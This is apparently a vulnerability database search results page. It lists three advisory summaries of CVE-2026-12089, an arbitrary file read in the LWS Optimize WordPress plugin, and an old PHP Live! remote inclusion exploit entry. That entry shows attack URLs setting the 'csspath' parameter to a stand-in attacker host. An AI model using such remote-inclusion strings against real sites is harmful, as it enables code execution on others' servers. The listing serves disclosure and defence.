Lucene search
K

4 matches found

NVD
NVD
added 2026/06/13 3:16 a.m.12 views

CVE-2026-12089

The LWS Optimize – All-in-One Speed Booster & Cache Tools plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 3.3.19. This is due to the combinecurrentcss function trusting values harvested from page HTML and converting same-site URLs to absolute filesystem...

4.9CVSS0.00336EPSS
Exploits0References3
CVE
CVE
added 2026/06/13 2:29 a.m.27 views

CVE-2026-12089

The vulnerability CVE-2026-12089 affects the WordPress plugin “LWS Optimize – All-in-One Speed Booster & Cache Tools” up to version 3.3.19. The root cause is in the combine_current_css() function, which trusts href values harvested from page HTML and converts same-site URLs to absolute filesyste...

4.9CVSS5.5AI score0.00336EPSS
Exploits0References3
Cvelist
Cvelist
added 2026/06/13 2:29 a.m.36 views

CVE-2026-12089 WS Optimize – All-in-One Speed Booster & Cache Tools <= 3.3.19 - Authenticated (Editor+) Arbitrary File Read

The LWS Optimize – All-in-One Speed Booster & Cache Tools plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 3.3.19. This is due to the combinecurrentcss function trusting values harvested from page HTML and converting same-site URLs to absolute filesystem...

4.9CVSS0.00336EPSS
Exploits0References3
0day.today
0day.today
added 2006/07/23 12:0 a.m.897 views

PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ PHP Live! ----------- Execution: help.php?csspath=htt://attacker setup/header.php?csspath=htt://attacker ----------- Vendor: At the moment, there are no solutions from the vendor...

7.1AI score
Exploits0
Rows per page
Query Builder